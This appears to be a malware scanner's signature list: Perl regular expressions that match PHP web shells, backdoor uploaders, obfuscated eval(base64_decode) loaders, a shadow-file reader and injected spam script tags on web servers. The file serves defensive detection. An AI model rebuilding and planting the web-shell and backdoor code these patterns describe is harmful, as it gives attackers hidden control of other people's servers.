qr/<html>\s+<head>.+?<title>utf<\/title>.+?touch\/\*;\*\/\(\$filename, \$time\);\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+set_time_limit\(0\);\s+error_reporting\(0\);\s+if\(get_magic_quotes_gpc\(\)\)\{\s+foreach\(\$_POST as \$key=>\$value\)\{.+?<title>404-server!!<\/title>.+?return \$info;\s+\}\s+\?>/is,
qr/<html>\s+<head>\s+<title>SH<\/title>.+?\$perm \.= \(\$mode & 00400\) \? \'r\' : \'-\';.+?print \"<\/table><\/div>\\n\";\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php error_reporting\(0\);\$ev=\$_GET\[\"ev\"\];if\(isset\(\$ev\)\&\&!empty\(\$ev\)\)\{eval\(base64_decode\(\$ev\)\);exit;\}\(\@copy\(\$_FILES\[\"file\"\]\[\"tmp_name\"\], \$_FILES\[\"file\"\]\[\"name\"\]\)\); \?>/is,
qr/<\?php\s+\@set_time_limit\(3600\);\s+\@ignore_user_abort\(1\);\s+\$xmlname =.+?return \$smuri;.+?=urldecode\(\"%6E1.+?\)\);\s+\?>/is,
qr/<\?php\s+\$password=\'([A-z0-9_]{1,20})\';\s+\$shellname=\'([A-z0-9_]{1,20})\';\s+\$myurl=null;.+?\$debuger \.= pack \(\"C\",hexdec \(substr \(\$string,\$one,2\)\)\);.+?Class_UC_key\(\"273B.+?\)\)\);\';\s+\$PHP=Create_Function\(\'\',\$filename\);\$PHP\(\);\?>/is,
qr/<\?php\s+\@ini_set\(\'output_buffering\',0\);\s+\@ini_set\(\'display_errors\', 0\);\s+\$BlackhatCode =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$BlackhatCode\)\)\)\)\)\);/is,
qr/<\?php \@ini_set\(\"error_log\",null\);\@ini_set\(\"log_errors\",0\);\@ini_set.+?unction getDirContents\(\$dir\)\{global \$file.+?file_put_contents\(\$path,base64_decode\(.+?\}else\{getDirContents\(\$_SERVER\[\'DOCUMENT_ROOT\'\]\);\}\}\}\}\}\}\}\}\};/is,
qr/<\?php error_reporting\(0\);chmod\(basename\(\$_SERVER\[\"PHP_SELF\"\]\), 0444\);echo\(\"\#0x2525\"\);if\(isset\(\$_GET\[\"u\"\]\)\)\{echo\'<form action=\"\" method=\"post\" enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\">\';echo\'<input type=\"file\" name=\"file\" size=\"30\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"><\/form>\';if\(\$_POST\[\'_upl\'\]==\"Upload\"\)\{if\(\@copy\(\$_FILES\[\'file\'\]\[\'tmp_name\'\],\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'Success\';\}else\{echo\'Fail\';\}\};\};/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\)\{\s+\$([A-z0-9_]{1,20}) \.= \$([A-z0-9_]{1,20})\[.+?if\(isset\(\$_REQUEST \/\*.+?\(\'n\'\.\'o\'\.\'\'\.\'\'\.\'\'\.\'i\'\.\'\'\.\'\'\.\'\'\.\'t\'\.\'\'\.\'\'\.\'\'\.\'c\'\.\'n\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'u\'\.\'\'\.\'\'\.\'f\'\.\'\'\.\'_\'\.\'e\'\.\'t\'\.\'\'\.\'\'\.\'a\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'e\'\.\'r\'\.\'c\'\);.+?\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?><\?php function.+?return \$\w\[\$\w\];\} \?>/is,
qr/\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\)\{\s+\$([A-z0-9_]{1,20}) \.= \$([A-z0-9_]{1,20})\[.+?if\(isset\(\$_REQUEST \/\*.+?\(\'n\'\.\'o\'\.\'\'\.\'\'\.\'\'\.\'i\'\.\'\'\.\'\'\.\'\'\.\'t\'\.\'\'\.\'\'\.\'\'\.\'c\'\.\'n\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'u\'\.\'\'\.\'\'\.\'f\'\.\'\'\.\'_\'\.\'e\'\.\'t\'\.\'\'\.\'\'\.\'a\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'e\'\.\'r\'\.\'c\'\);.+?\$\w\(\);\s+exit\(\);\s+\}/is,
qr/<\?php\s+\/\/header\(\'Content-Type:text\/html; charset=utf-8\'\);.+?=base64_decode\(\".+?foreach\(\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x4f\\x30\\x30\\x5f\\x4f\\x30\\x4f\\x5f\\x4f\\x5f\"\]\(\);\?>/is,
qr/<\?php\s+eval\(gzuncompress\(base64_decode\(.+?\)\)\);\?>/is,
qr/<\?php \@error_reporting\(0\);\$.+?=array\(.+?\$payload=.+?\(\"\\x65\\x76\\x61\\x6c\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x24\\x70\\x61\\x79\\x6c\\x6f\\x61\\x64\\x29\\x2c\\x30\\x29\\x29\\x29\"\);/is,
qr/<\?php\s+\/*.+?\$([A-z0-9_]{1,20}) = \"\(.+?\$([A-z0-9_]{1,20}) = \"\";\s+foreach\(\[.+?\$([A-z0-9_]{1,20})\(\'n\'\.\'\'\.\'\'\.\'o\'\.\'i\'.+?\/\*([A-z0-9_]{20,})\*\//is,
qr/if\(!class_exists\(\'Ratel\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{if\(is_user_logged_in\(\)\)\{return false;\}\}if\(isset\(\$_REQUEST\[\'xftest\'\]\)\)\{die\(pi\(\)\*6\);\}.+?\$is_bot=0;if\(\@preg_match\(\"\/\(googlebot\|msnbot.+?\{die\(\'suspicious request denied\'\);\}\}class Ratel\{public \$links_url=.+?\$ratel=new Ratel;\$ratel->init\(\$ruri,\$host,\$is_bot\);\}.+?\@include_once\(.+?\.php\'\);/is,
qr/<\?php\s+if \(\@\$_SERVER\[\'HTTP_X_([A-z0-9_]{1,20})\'\]\) \{\s+echo \"YES_YES\";\s+if \(\@\$_SERVER\[\'HTTP_X_TO\'\]\) \{\s+file_put_contents\(\@\$_SERVER\[\'HTTP_X_TO\'\], \@\$_SERVER\[\'HTTP_X_DATA\'\]\);\s+\}\s+\}\s+\?><\?php \/\*.+?\*\/\@\$([A-z0-9_]{1,20})&&\@\$W\(\$X\(\$Y,\$Z\)\);\/\*.+?\*\/ \?>/is,
qr/<\?php \/\*\s+GNU GENERAL PUBLIC.+?\*\/extract\(\$_COOKIE\);\/\*.+?\*\/\@\$([A-z0-9_]{1,20})&&\@\$W\(\$X\(\$Y,\$Z\)\);\/\*.+?\*\/ \?>/is,
qr/<\?php\s+if \(\@\$_SERVER\[\'HTTP_X_([A-z0-9_]{1,20})\'\]\) \{\s+echo \"YES_YES\";\s+if \(\@\$_SERVER\[\'HTTP_X_TO\'\]\) \{\s+file_put_contents\(\@\$_SERVER\[\'HTTP_X_TO\'\], \@\$_SERVER\[\'HTTP_X_DATA\'\]\);\s+\}\s+\}\s+\?>/is,
qr/if\(!class_exists\(\'Ratel\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{if\(is_user_logged_in\(\)\)\{return false;\}\}if\(isset\(\$_REQUEST\[\'xftest\'\]\)\)\{die\(pi\(\)\*6\);\}.+?\$ratel=new Ratel;\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'.+?\$b=base64_decode\(\$html\);\s+\}\s+if\(strlen\(\$b\)<300\)\{echo \'indexcode not ok\';exit;\};\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$b\);echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+\@session_start\(\);.+?\$default_use_ajax = true;\s+\$_F=__FILE__;\$_X=.+?eval\(base64_decode\(.+?\)\);\?>/is,
qr/<\?php eval\(gzinflate\(gzinflate\(base64_decode\(\".+?\"\)\)\)\); \?>/is,
qr/<\?php\s+if \(isset \(\$_GET\[\'check\'\]\)\) \{\s+echo \"checked\";.+?<h1>File<\/h1>.+?echo\(\"FILE\"\);\s+\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"\w\*\"\);return \$a\[\$i\];\} \?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'.+?\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'-_,\',\'+\/=\'\)\);\s+\$b =base64_decode\(file_get_contents\(\$_POST\[\'b\'\]\)\);\s+\@file_put_contents\(\$index,\$b\);\s+echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'.+?\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$a =base64_decode\(strtr\(\$_POST\[\'.+?\'\], \'-_,\', \'+\/=\'\)\);\s+\$a=\'<\?php \'\.\$a\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$a\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[.+?\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\].+?\$b =base64_decode\(file_get_contents\(\$_POST\[\'b\'\]\)\);\s+\@file_put_contents\(\$index,\$b\);\s+echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+ini_set\(\'display_errors\', 0\);\s+\$install_code =.+?\$install_hash = md5\(\$_SERVER\[\'HTTP_HOST\'\] \. AUTH_SALT\);.+?wp-includes\/class\.wp\.php\';\s+\}\s+\}\s+\?><\?php error_reporting\(0\);\?>/is,
qr/<\?php eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\".+?\"\)\)\)\)\);/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'base\' \.\'64_d\' \.\'ecod\' \.\'e\';\$([A-z0-9_]{1,20}) = \'im\' \.\'pl\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\)\)\)\); \?>/is,
qr/<center><\? echo \'<b>Mailer<\/b><br>.+?<input type=hidden name=a value=\'FilesMan\'>.+?\$data=curl_exec\(\$ch\);if\(\!\$data\)\{return false;\}return \$data;\}exit;/is,
qr/<\?php header\(\"Cont\\145nt-Type: te\\x78t\/html; charset=utf-8\"\);error_reporting\(.+?\@preg_split\(\"\/\\x5cR\\134R\/\",\$([A-z0-9_]{1,20}),-0173- -0124-0213- -0264\);\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20});endif;endif;return\$([A-z0-9_]{1,20});\};/is,
qr/<\?php echo \'2018\'\.\'2019\'; if \(isset\(\$_REQUEST\[\'e\'\]\)\) \{ \$e = \$_REQUEST\[\'e\'\]; \$arr = array\(\$_POST\[\'w0w\'\],\); array_filter\(\$arr, \$e\); \}\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+set_time_limit\(0\);\s+if \(\$_GET\[\'q\'\]==\'1\'\)\{echo \'200\'; exit;\}\s+if\(\$_GET\[\'key\'\]==\'.+?\'\)eval\(base64_decode\(\$_POST\[\'fack\'\]\)\);\s+if\(md5\(\$_GET\[\'key\'\]\)==\'.+?\'\)eval\(base64_decode\(\$_POST\[\'fack\'\]\)\);\s+\?> /is,
qr/<\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?><\?php function.+?\(\$_1\)\)\);if\(isset\(\$_1\)\)\{\@eval\(\$_1\);exit\(\);\}\}/is,
qr/<\?php\s+error_reporting\(E_ERROR\).+?\}else\{.+?\@eval\(base64_decode\(strtr\(\$_POST\[.+?\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+function get_contents\(\$url\)\{.+?\$a = get_contents\(\'http:\/\/.+?eval\(\'\?>\'\.\$a\);/is,
qr/<\?php \$([A-z0-9_]{1,20})=.+?\/index\.help\';\$([A-z0-9_]{1,20})=.+?\$([A-z0-9_]{1,20})=\'\';\@eval\(base64_decode\(.+?\)\);\/\*,\*\/\?>/is,
qr/<\?php\s+error_reporting\(E_ERROR\).+?\$a =base64_decode\(strtr\(\$_POST\[.+?\@eval\(base64_decode\(strtr\(\$_POST\[.+?\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[.+?\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\].+?\@touch\(\$index,strtotime\(\"-400 days\"\)\);echo \'ok\';\s+\}\s+\?>/is,
qr/<\?php if \(isset\(\$_COOKIE\[\"([A-z0-9_]{1,10})\"\]\) and md5\(\$_COOKIE\[\"([A-z0-9_]{1,10})\"\]\) ==\"([A-z0-9_]{1,32})\"\) \{unlink\(__FILE__\); die\(md5\(([A-z0-9_]{1,10})\)\);\}/is,
qr/<\?php\s+\$md5 = \"([A-z0-9_]{1,32})\";\s+\$([A-z0-9_]{1,5}) = array\(.+?4.+?6.+?\);\s+\$([A-z0-9_]{1,32}) = create_function\(.+?\'\);\s+\?>/is,
qr/<\?php\s+\$md5 = \"([A-z0-9_]{1,32})\";\s+\$([A-z0-9_]{1,5}) = array\(.+?6.+?4.+?\);\s+\$([A-z0-9_]{1,32}) = create_function\(.+?\'\);\s+\?>/is,
qr/<\?php\s+\$.+?if\(!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from,\$to,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from,\"\?\:\\\\\/\*\^\$\"\)\.\"\/si\",\$to,\$string\)\);\}\};\$.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x4f\\x4f\\x4f\\x30\\x4f\\x5f\\x30\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<\?php.+?\$filter = \'base\'\.\'6\'\.\'4\'\.\'_decode\';.+?\$prepare_func = \'g\'\.\'z\'\.\'inflate\';.+?return \@\$prepare_func\( \$filter \);.+?\}\s+wp_admin_bar_header\(\);/is,
qr/<\?php if\(isset\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$myvar = base64_decode\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\); eval\(\$myvar\);\}\?>/is,
qr/<\?php\s+if \(isset\(\$_GET\[\'([A-z0-9_]{1,20})\'\]\)\)\{die\(\'OK\'\);\}.+?function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20}) = \"\\x.+?\]; \} \} return \$([A-z0-9_]{1,20}); \}\s+\/\*.+?\*\/\s+\$([A-z0-9_]{1,20}) = \".+?\)\)\);\s+\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20}) = \"\\x.+?\*\/\s+\$([A-z0-9_]{1,20}) = \".+?\)\)\);\s+\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\"\\x61\"\.\"\\x75\"\.chr\(116\)\.\"h\"\.\"\\x5f\"\.\"p\"\.\"a\"\.\"\\x73\"\.\"\\x73\";.+?\)\)\);\s+#############################################################################/is,
qr/<\?php\s+\$d=\".+?eval\(([A-z0-9_]{1,20})\(base64_decode\(\$d\), 1234567890\)\);.+?return gzinflate\(\$([A-z0-9_]{1,20})\);\s+\}\s+\?>/is,
qr/<\?php\s+#([A-z0-9_]{1,20})#\s+\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\); \?><\? function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\);return base64_decode\(\$a\[\$i\]\);\} \?>.+?\}\s+#\/([A-z0-9_]{1,20})#\s+\?>/is,
qr/<\?php\s+\?>/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3B\",\"\"\); \?>/is,
qr/GIF89A;<\?php if\(!function_exists\(.+?base64_decode.+?\)\);\?>/is,
qr/<\?php eval\(\$_REQUEST\[cmd\]\); \?>/is,
qr/<\?php\s+system\(\'uname -a\'\);\s+unlink\(__FILE__\);\s+\?>/is,
qr/#([A-z0-9_]{1,20})#\s+\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\); \?><\? function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\);return base64_decode\(\$a\[\$i\]\);\} \?>.+?\}\s+#\/([A-z0-9_]{1,20})#/is,
qr/<\?php\s+function get_files\(\$dir = \"\.\".+?eval\(base64_decode\(\".+?\"\)\);\s+\?>/is,
qr/<\?php\s+\$.+?=\'wp-admin\';\s+\$.+?\]\(\);\?>/is,
qr/<\?php\s+\@include_once\(\"tetete\.php\"\);\s+\?>/is,
qr/<\?php.+?Simple Plugin.+?\$a = chr\(.+?\@array_diff_ukey\(\@array\(\(string\)\(\$a\) => 1\), \@array\(\(string\)\(\$b\) => 2\), \$c\);\s+\@include\(\$a\);\s+\@unlink\(\$a\);/is,
qr/<script type=\'text\/javascript\' async src=\'https:\/\/somelandingpage\.com\/.+?\'><\/script>/is,
qr/<\?php if\(\!class_exists\(\'KF\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\)\{.+?class KF\{public \$url=\"\\x68.+?init\(\$uri,\$ua\);\}/is,
qr/<\?php if\(\!class_exists\(\'KF\'\)\)\{if\(function_exists\(\'is_user_logged_in\'\)\).+?#rogerbot\|exabot\|mj12bot\|dotbot.+?\$ratel=new KF;\$ratel->init\(\$uri,\$ua\);\}/is,
qr/<script type=\'text\/javascript\' async src=\'https\:\/\/setforspecialdomain\.com\/.+?\'><\/script>/is,
qr/<\?php\s+ignore_user_abort\(true\);set_time_limit\(0\);error_reporting\(0\);define\(.+?\[0x00000e\]\(\$.+?CURLOPT_RETURNTRANSFER,0x001\);\$.+?\[0x0002a\]\)\);\}\?>/is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}).+?return \$([A-z0-9_]{1,20}); \}\s+\/\*([A-z0-9_]{50,})\*\/\s+\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20})\(\'n\'\.\'\'\.\'o\'\.\'i\'\.\'t\'.+?\(\);\s+\/\*([A-z0-9_]{50,})\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\';\s+\$([A-z0-9_]{1,20})=\'wp-content\';\s+\$([A-z0-9_]{1,20})=base64_decode\(\".+?\[\"\\x4f\\x4f\\x4f\\x30\\x30\\x5f\\x4f\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"\\150\\145\\x61d\\x65\\x72\".+?<html>\s+<head><meta http-equiv=\"Content-Type\" content=\"text\/html; charset=utf-8\">.+?echo \$([A-z0-9_]{1,20}); \} \} \} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = \"\\x63\\x68\\x72\"; \$([A-z0-9_]{1,20}) = \"\\x69\\x6e\\x74\\x76\\x61\\x6c\";.+?\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\); include_once\(\$([A-z0-9_]{1,20})\); \?><\?php \@include_once\(\"index\.php\"\); \?>/is,
qr/<\?php error_reporting\(0\);.+?ini_set\(\"error_log\", "\/dev\/null\"\);.+?\$contents = \@file_get_contents\(\$url, false, \$context\); \} \} return \$contents; \} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{32})\";\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\,\$([A-z0-9_]{1,20})\)\{\$([A-z0-9_]{1,20})=strlen\(\$([A-z0-9_]{1,20})\);\$([A-z0-9_]{1,20})=strlen\(\$([A-z0-9_]{1,20})\).+?\);__halt_compiler\(\);([A-z0-9_]{1,20})/is,
qr/<\?php\s+function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\, \$([A-z0-9_]{1,20}) = \"\\61\\x32\\63\"\) .+?\(\"n\"\.\"o\"\.\"i\"\.\"t\"\..+?\$([A-z0-9_]{1,20})\(\);\s+\/\*.+?\*\//is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = base64_decode\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);.+?imap_mail.+?echo \'([A-z0-9_]{1,20}) : \' \. \$([A-z0-9_]{1,20});\}/is,
qr/<\?php.+?\$a=\$_COOKIE\[\'a\'\];\$ho=urldecode\(\$_COOKIE\[\'ho\'\]\).+?Cookie: \"\.\$data\.\"\\r\\n\\r\\n\"\);socket_close\(\$socket\);\}die\(\);\}\s+\?>/is,
qr/<script type=\"text\/javascript\">var _0xc9e1=\[.+?\+ makeid\(\)\}\}<\/script>/is,
qr/<\?php if\(!class_exists\(\'Ratel\'\)\).+?init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\$_REQUEST\[\'.+?\'\]\);exit;\/\*.+?\*\/\}\?>/is,
qr/<\?php eval\(base64_decode\(\'aWYg.+?QpleGl0KCk7\'\)\);/is,
qr/<\?php \$a = chr\(95\)\.chr\(116\)\.chr\(101\)\.chr\(109\)\..+?\@include\(\$a\);\@unlink\(\$a\); \?>/is,
qr/<\?php.+?\$a = chr\(95\)\.chr\(116\)\.chr\(101\)\.chr\(109\)\..+?\@include\(\$a\);\@unlink\(\$a\); \?>/is,
qr/<\?php\s+\$O_00O__0OO=\'\';.+?if\(\!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from,\$to,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from.+?\[\"\\x4f\\x4f\\x5f\\x4f\\x4f\\x30\\x30\\x30\\x5f\\x5f\"\]\(\);\?>/is,
qr/<?PhP.+?Mass Defacement Script By Hunter Bajwa.+?endforeach;\s+\}\s+\?>/is,
qr/<\?php\s+set_time_limit\(0\);.+?\$t = \@str_replace\(\"www\.\"\,\"\"\,\$t\); \@\$passwd = file_get_contents\(\'\/home\/\'\.\$user\.\'\/etc\/\'\.\$t\.\'\/shadow\'\);.+?fclose\(\$connection\); \} \}\s+\?>/is,
qr/<\?php \/\*.+?\'\.\/\*exit;\*\/\"\"\.\'.+?\*\/\'e\'\.\"\"\.\/\*echo\*\/\'\(\".+?\"\)\);\'\);\$([A-z0-9_]{1,20})\/\*exit;\*\/\(\);\/\*die\(\"([A-z0-9_]{1,20})\"\);\*\/ \?>/is,
qr/<\?php\s+\$urls = array \(\s+\'http:\/\/.+?<meta http-equiv=\"refresh\" content=\"1; url=<?php echo \$rand_url;\?> \">/is,
qr/<\?php \@array_diff_ukey\(\@array\(\(string\)\$_REQUEST\[\'password\'\]=>1\)\,\@array\(\(string\)stripslashes\(\$_REQUEST\[\'re_password\'\]\)=>2\)\,\$_REQUEST\[\'login\'\]\); \?>/is,
qr/<\?php\s+\@session_start\(\);.+?echo \'<font color=\"green\">Upload Success\.\.<\/font><br \/>\';.+?\(\(\$perms \& 0x0200\) \? \'T\' \: \'\-\'\)\);\s+return \$info;\s+\}\s+\?>/is,
qr/<center>\s+<\?php\s+error_reporting\(0\);\s+if\(isset\(\$_GET\[host\]\)\).+?\.php_uname\(\)\..+?\}else\{echo\"<b>\";\}\}\} \?>\s+<\/center>/is,
qr/<\?php\s+set_time_limit\(0\);.+?function exect\(\$cmd\) \{\s+if\(function_exists\(\'system\'\)\) \{ .+?eof\(\);\s+echo \'<\/a>\';\s+echo \'<\/div>\';\s+echo \'<\/div>\';\s+\?>/is,
qr/\#\!\/bin\/bash\s+\# Using ZeroShell V 1\.3.+?function miningblue\(\).+?ostcheck\s+fi/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'.+?\$([A-z0-9_]{1,20})=\'.+?\'; \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(\'\'\, \'.+?\$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20})\(\);/is,
qr/<\?php.+?=== SecuPress Backdoor User ===.+?<\/div>\s+\<\/footer>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$a\[0\]=\'.+?\$a\[1\]=\'.+?\$a\[2\]=\'.+?eval\(trim\(base64_decode\(base64_decode\(\$co\)\)\)\); \?>/is,
qr/<\?php\s+\$GLOBALS\[\'\_\_ALFA\_\_\'\] = array\(\'user\' => \'deathphantom\'\, \/\/username.+?if \(\!function_exists\(\'b\' \. \'as\' \. \'e6\' \. \'4\_\' \. \'en\' \. \'co\' \. \'de\'\)\) \{.+?\'\); \?>/is,
qr/<\?php \/\*\*\* WebShellOrb 2\.6 - With PHP 7 \*\*\*\/ \$([A-z0-9_]{1,30})=file\(\_\_FILE\_\_\);eval\(base64_decode\(\"aWYo.+?\)\)\);\_\_halt\_compiler\(\);aWYo\Z/is,
qr/<\?php\s+session_start\(\);.+?<title>IndoXploit<\/title>.+?serverinfo\(\);\s+action\(\);\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<head>\s+<title>:: Res7ock Crew<\/title>.+?Res7ock Crew<\/font><\/td><\/table><\/div><\/center><\/body><\/html>/is,
qr/<\?php\s+\$O_O0__OO00=\'\';\s+\$O_O0_OO0_0=\(\".+?if\(\!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from\,\$to\,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from.+?\[\"\\x4f\\x30\\x30\\x5f\\x5f\\x30\\x4f\\x4f\\x5f\\x4f\"\]\(\);\?>/is,
qr/<\!DOCTYPE HTML PUBLIC \"\-\/\/IETF\/\/DTD HTML 2\.0\/\/EN\"> <html><head> <title>404 Not Found<\/title> <\/head><body> <h1>Not Found<\/h1> <p>The requested URL \/error\.php was not found on this server\.<\/p> <\/body><\/html> <\?php \@preg_replace\(\"\/\[checksql\]\/e\"\,\$_POST\[\'date\'\]\,\"saft\"\); header\(\'HTTP\/1\.1 404 Not Found\'\); \?>/is,
qr/<\?php\s+\$c0000101101.+?\$c00100.+?\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\'\,\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(\'.+?array\(\'b\' \,\'a\' \,\'s\' \,\'e\' \,\'6\' \,\'4\' \,\'\_\' \,\'d\' \,\'e\' \,\'c\' \,\'o\' \,\'d\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\'\, \'comp\'\, \'ress\'\) ;\$([A-z0-9_]{1,20}) = \'im\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'\'\.chr\(100\)\.\'e\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\'\, \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\'\, \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\'\, \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\}\?>/is,
